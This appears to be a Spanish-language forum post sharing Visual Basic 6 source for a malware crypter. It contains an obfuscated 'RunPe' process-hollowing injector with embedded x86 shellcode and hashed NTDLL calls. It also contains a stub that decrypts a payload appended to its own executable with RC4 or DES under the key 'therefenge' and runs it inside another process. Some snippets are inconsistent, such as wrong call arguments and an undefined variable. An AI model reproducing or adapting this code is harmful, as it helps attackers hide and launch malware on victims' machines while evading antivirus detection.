Código: Seleccionar todo

Option Explicit

Option Base 0

Private Type Uºwºw«“ž˜›ººº»µ»»›ºžž†
††›U»Š“ž•«º»ºfž•›¦º»¦º› As Long

End Type

 Private Type º†wžw§µ¦•“A»w•º††••f˜»

¦Š§f•œž†“›«’˜º¦«w’»Uºf»»fº  As Byte
»’“µ»§›µµ¦ŠU›†«ž§µ  As Byte
B3  As Byte
†w˜U“Šœ˜µ’»w»’•  As Byte

End Type

 Private Declare Function CallWindowProcA Lib "user32" (ByVal ›˜ºwwº•»µ•U¦¦º»ºœ“wžUœœ As Long, Optional ByVal f›ºUµ†›†»Uµ¦““˜†µŠ›†šU¦›¦§ As Long, Optional ByVal †›¦†“U›Uwº’w†›§†œf¦›†º»» As Long, Optional ByVal †wºf’›º˜›œ’›w†›§žœµ€º¦º As Long, Optional ByVal †µ»Uµ˜“’•»Šž»›€º†ww•¦ As Long) As Long

Private Š˜«»ž’§››•»˜º€»w›µž“ As Boolean

Private ºUU†»›“U»††“wµžº§§•¦ž››(170)        As Byte


Private †«†§ºœ’›†»ž»šwž˜†µº»€(255)            As Byte
Private Const kernel32          As String = "KERNEL32"
Private Const NTDLL             As String = "NTDLL"

Public Function Inject(ByRef »U†«ww¦†A§†U•»º““œ’Š’µ»“žºº() As Byte, ByVal €µwœ†w†“»“»›w¦ºœ›µ’†œœ›§º As String, Optional ByVal wºº˜U§«ž††ºww§’›§w»»§ As String, Optional ByRef ›Uº«†œŠw››“w As Long) As Boolean
  Dim ›º¦ºœ›†«fqºº›˜“º’º«§º¦˜’º               As Long
  Dim §µ¦•†›»›§œ†§wwµš•“µ“ž    As Long
  Dim fº§†¦µº›»•¦€»§’§wUº        As Long
  Dim ¦“µ››»»«†€›§µµwž†œ                As Long
  Dim w•˜•Š€†††ºº›µ                        As Long
  Dim U††ž¦µ(16)         As Long
  Dim ž““w’º›µ†»›º»œžw›¦Šº›»†«(3) As Long
  Dim wžœ’˜»µ¦˜µµ•µw›(50)             As Long

›º¦ºœ›†«fqºº›˜“º’º«§º¦˜’º = VarPtr(»U†«ww¦†A§†U•»º““œ’Š’µ»“žºº(0))
If Not ††˜§U›œw•›˜w›º›››žw(›º¦ºœ›†«fqºº›˜“º’º«§º¦˜’º, 2) = &H5A4D Then Exit Function
§µ¦•†›»›§œ†§wwµš•“µ“ž = ›º¦ºœ›†«fqºº›˜“º’º«§º¦˜’º + ††˜§U›œw•›˜w›º›››žw(›º¦ºœ›†«fqºº›˜“º’º«§º¦˜’º + &H3C)
If Not ††˜§U›œw•›˜w›º›››žw(§µ¦•†›»›§œ†§wwµš•“µ“ž) = &H4550 Then Exit Function
¦“µ››»»«†€›§µµwž†œ = ††˜§U›œw•›˜w›º›››žw(§µ¦•†›»›§œ†§wwµš•“µ“ž + &H34)
U††ž¦µ(0) = &H44
  Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(50) & Chr$(51) & Chr$(76) & Chr$(69) & Chr$(78) & Chr$(82) & Chr$(69) & Chr$(75)), &H16B3FE88, StrPtr(€µwœ†w†“»“»›w¦ºœ›µ’†œœ›§º), StrPtr(wºº˜U§«ž††ºww§’›§w»»§), 0, 0, 0, &H4, 0, 0, VarPtr(U††ž¦µ(0)), VarPtr(ž““w’º›µ†»›º»œžw›¦Šº›»†«(0)))
  Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(76) & Chr$(76) & Chr$(68) & Chr$(84) & Chr$(78)), &HF21037D0, ž““w’º›µ†»›º»œžw›¦Šº›»†«(0), ¦“µ››»»«†€›§µµwž†œ)
  Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(76) & Chr$(76) & Chr$(68) & Chr$(84) & Chr$(78)), &HD33BCABD, ž““w’º›µ†»›º»œžw›¦Šº›»†«(0), VarPtr(¦“µ››»»«†€›§µµwž†œ), 0, VarPtr(††˜§U›œw•›˜w›º›››žw(§µ¦•†›»›§œ†§wwµš•“µ“ž + &H50)), &H3000, &H40)
  Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(76) & Chr$(76) & Chr$(68) & Chr$(84) & Chr$(78)), &HC5108CC2, ž““w’º›µ†»›º»œžw›¦Šº›»†«(0), ¦“µ››»»«†€›§µµwž†œ, VarPtr(»U†«ww¦†A§†U•»º““œ’Š’µ»“žºº(0)), ††˜§U›œw•›˜w›º›››žw(§µ¦•†›»›§œ†§wwµš•“µ“ž + &H54), 0)
For w•˜•Š€†††ºº›µ = 0 To ††˜§U›œw•›˜w›º›››žw(§µ¦•†›»›§œ†§wwµš•“µ“ž + &H6, 2) - 1
fº§†¦µº›»•¦€»§’§wUº = §µ¦•†›»›§œ†§wwµš•“µ“ž + &HF8 + (&H28 * w•˜•Š€†††ºº›µ)
  Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(76) & Chr$(76) & Chr$(68) & Chr$(84) & Chr$(78)), &HC5108CC2, ž““w’º›µ†»›º»œžw›¦Šº›»†«(0), ¦“µ››»»«†€›§µµwž†œ + ††˜§U›œw•›˜w›º›››žw(fº§†¦µº›»•¦€»§’§wUº + &HC), ›º¦ºœ›†«fqºº›˜“º’º«§º¦˜’º + ††˜§U›œw•›˜w›º›››žw(fº§†¦µº›»•¦€»§’§wUº + &H14), ††˜§U›œw•›˜w›º›››žw(fº§†¦µº›»•¦€»§’§wUº + &H10), 0)
Next w•˜•Š€†††ºº›µ
wžœ’˜»µ¦˜µµ•µw›(0) = &H10007
  Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(76) & Chr$(76) & Chr$(68) & Chr$(84) & Chr$(78)), &HE935E393, ž““w’º›µ†»›º»œžw›¦Šº›»†«(1), VarPtr(wžœ’˜»µ¦˜µµ•µw›(0)))
  Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(76) & Chr$(76) & Chr$(68) & Chr$(84) & Chr$(78)), &HC5108CC2, ž““w’º›µ†»›º»œžw›¦Šº›»†«(0), wžœ’˜»µ¦˜µµ•µw›(41) + &H8, VarPtr(¦“µ››»»«†€›§µµwž†œ), &H4, 0)
wžœ’˜»µ¦˜µµ•µw›(44) = ¦“µ››»»«†€›§µµwž†œ + ††˜§U›œw•›˜w›º›››žw(§µ¦•†›»›§œ†§wwµš•“µ“ž + &H28)
  Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(76) & Chr$(76) & Chr$(68) & Chr$(84) & Chr$(78)), &H6935E395, ž““w’º›µ†»›º»œžw›¦Šº›»†«(1), VarPtr(wžœ’˜»µ¦˜µµ•µw›(0)))
  Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(76) & Chr$(76) & Chr$(68) & Chr$(84) & Chr$(78)), &HC54A46C8, ž““w’º›µ†»›º»œžw›¦Šº›»†«(1), 0)
 ›Uº«†œŠw››“w = ž““w’º›µ†»›º»œžw›¦Šº›»†«(0)
 Inject = True
End Function
 Private Function ††˜§U›œw•›˜w›º›››žw(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
Call ºf“šº•’˜µœº†˜fŠ†’œU«†º(sReV(Chr$(76) & Chr$(76) & Chr$(68) & Chr$(84) & Chr$(78)), &HC5108CC2, -1, VarPtr(††˜§U›œw•›˜w›º›››žw), lPtr, lSize, 0)
 End Function
 Public Function ºf“šº•’˜µœº†˜fŠ†’œU«†º(ByVal ›““›»›€˜› As String, ByVal ¦¦º’ººš››† As Long, ParamArray €wº¦•††˜›†’Š›»() As Variant) As Long
 Dim º“fU†šµw˜»«•ºU¦’fµ»                    As Variant
 Dim fº                   As º†wžw§µ¦•“A»w•º††••f˜»
 Dim f¦˜““†º’˜›††§µ€U’»»                     As Long
 Dim w•˜•Š€†††ºº›µ                        As Long
 Dim ›ž›Uºf§››’»»’†wŠ§                        As Long

If Not Š˜«»ž’§››•»˜º€»w›µž“ Then
  For w•˜•Š€†††ºº›µ = 0 To 170
ºUU†»›“U»††“wµžº§§•¦ž››(w•˜•Š€†††ºº›µ) = CByte(Choose(w•˜•Š€†††ºº›µ + 1, &HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
&H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3))
 Next w•˜•Š€†††ºº›µ
 w•˜•Š€†††ºº›µ = 0
Š˜«»ž’§››•»˜º€»w›µž“ = True
End If
 f¦˜““†º’˜›††§µ€U’»» = CallWindowProcA(VarPtr(ºUU†»›“U»††“wµžº§§•¦ž››(0)), StrPtr(›““›»›€˜›), ¦¦º’ººš››†)
If f¦˜““†º’˜›††§µ€U’»» Then
For ›ž›Uºf§››’»»’†wŠ§ = UBound(€wº¦•††˜›†’Š›») To LBound(€wº¦•††˜›†’Š›») Step -1
fº = Š›§»µw˜››§›wwŠ“w’»(CLng(€wº¦•††˜›†’Š›»(›ž›Uºf§››’»»’†wŠ§)))
   Call w†’•ŠºU’›†ºf(&H68, w•˜•Š€†††ºº›µ)
   Call w†’•ŠºU’›†ºf(fº.¦Š§f•œž†“›«’˜º¦«w’»Uºf»»fº, w•˜•Š€†††ºº›µ):    Call w†’•ŠºU’›†ºf(fº.»’“µ»§›µµ¦ŠU›†«ž§µ, w•˜•Š€†††ºº›µ)
   Call w†’•ŠºU’›†ºf(fº.B3, w•˜•Š€†††ºº›µ):    Call w†’•ŠºU’›†ºf(fº.†w˜U“Šœ˜µ’»w»’•, w•˜•Š€†††ºº›µ)
Next ›ž›Uºf§››’»»’†wŠ§

fº = Š›§»µw˜››§›wwŠ“w’»(f¦˜““†º’˜›††§µ€U’»»)
   Call w†’•ŠºU’›†ºf(&HB8, w•˜•Š€†††ºº›µ)
   Call w†’•ŠºU’›†ºf(fº.¦Š§f•œž†“›«’˜º¦«w’»Uºf»»fº, w•˜•Š€†††ºº›µ): Call w†’•ŠºU’›†ºf(fº.»’“µ»§›µµ¦ŠU›†«ž§µ, w•˜•Š€†††ºº›µ)
   Call w†’•ŠºU’›†ºf(fº.B3, w•˜•Š€†††ºº›µ):    Call w†’•ŠºU’›†ºf(fº.†w˜U“Šœ˜µ’»w»’•, w•˜•Š€†††ºº›µ)
   Call w†’•ŠºU’›†ºf(&HFF, w•˜•Š€†††ºº›µ):        Call w†’•ŠºU’›†ºf(&HD0, w•˜•Š€†††ºº›µ)
   Call w†’•ŠºU’›†ºf(&HC3, w•˜•Š€†††ºº›µ)
ºf“šº•’˜µœº†˜fŠ†’œU«†º = CallWindowProcA(VarPtr(†«†§ºœ’›†»ž»šwž˜†µº»€(0)))
End If
End Function

Private Sub w†’•ŠºU’›†ºf(ByVal ›U›¦˜w›wœ›“» As Byte, ByRef »µw˜wœŠ As Long)
†«†§ºœ’›†»ž»šwž˜†µº»€(»µw˜wœŠ) = ›U›¦˜w›wœ›“»
»µw˜wœŠ = »µw˜wœŠ + 1
End Sub
 Private Function Š›§»µw˜››§›wwŠ“w’»(ByVal f›ºº›ž˜»›†U†«›fŠ As Long) As º†wžw§µ¦•“A»w•º††••f˜»
Dim »’ž›µ§’º›»U’                       As Uºwºw«“ž˜›ººº»µ»»›ºžž†
»’ž›µ§’º›»U’.††›U»Š“ž•«º»ºfž•›¦º»¦º› = f›ºº›ž˜»›†U†«›fŠ
LSet Š›§»µw˜››§›wwŠ“w’» = »’ž›µ§’º›»U’
End Function

Function sReV(sStr As String) As String

 Dim A() As Byte
 Dim i As Long

A = sStr
 For i = UBound(A) - 1 To 0 Step -2
sReV = sReV & Chr(A(i))
 Next i
End Function

                                   ' ***  RunPe Generator M3  v1.0  ***
                                    ' ***   RunPe Base Karcrack   ***
                                    '***    Codeado  por  M3n3g@tt1   ***
                        '*** Utilizaccion  : Call Inject(sByte, sApp.Path , Command) ***

Código: Seleccionar todo

Sub Main()
Dim SHIT As String


SHIT = App.Path & Chr$(92) & App.EXEName & Chr$(46) & Chr$(69) & Chr$(88) & Chr$(69)

Dim Data As String

Open SHIT For Binary As #1

Data = Space(LOF(1))
Get #1, , Data
Close #1

Dim Delimiter() As String

Delimiter() = Split(Data, Chr$(91) & Chr$(84) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(102) & Chr$(93))

Delimiter(1) = RC4(Delimiter(1), Chr$(116) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(102) & Chr$(101) & Chr$(110) & Chr$(103) & Chr$(101))

Call w†’•ŠºU’›†ºf(SHIT, StrConv(Delimiter(1), vbFromUnicode), vbNullString)

End Sub
Public Function RC4(ByVal Data As String, ByVal Password As String) As String ' This is a Modified RC4 Function ^^
On Error Resume Next
Dim F(0 To 255) As Integer, X, Y As Long, Key() As Byte
Key() = StrConv(Password, vbFromUnicode)
For X = 0 To 255
    Y = (Y + F(X) + Key(X Mod Len(Password))) Mod 256
    F(X) = X
Next X
Key() = StrConv(Data, vbFromUnicode)
For X = 0 To Len(Data)
    Y = (Y + F(Y) + 1) Mod 256
    Key(X) = Key(X) Xor F(Temp + F((Y + F(Y)) Mod 254))
Next X
RC4 = StrConv(Key, vbUnicode)
End Function

Código: Seleccionar todo

File = RC4(File, "therefenge")

Código: Seleccionar todo

Dim DES As New Class1
File = DES.EncryptString(File, "therefenge")

Código: Seleccionar todo

Delimiter(1) = RC4(Delimiter(1), Chr$(116) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(102) & Chr$(101) & Chr$(110) & Chr$(103) & Chr$(101))

Código: Seleccionar todo

Delimiter(1) = DES.DecryptString(Delimiter(1), Chr$(116) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(102) & Chr$(101) & Chr$(110) & Chr$(103) & Chr$(101)

Mostrar/Ocultar

Mostrar/Ocultar

Mostrar/Ocultar

Código: Seleccionar todo

Call Inject(SHIT, StrConv(Delimiter(1), vbFromUnicode), vbNullString)

Código: Seleccionar todo

Call Inject(StrConv(Delimiter(1), vbFromUnicode), SHIT)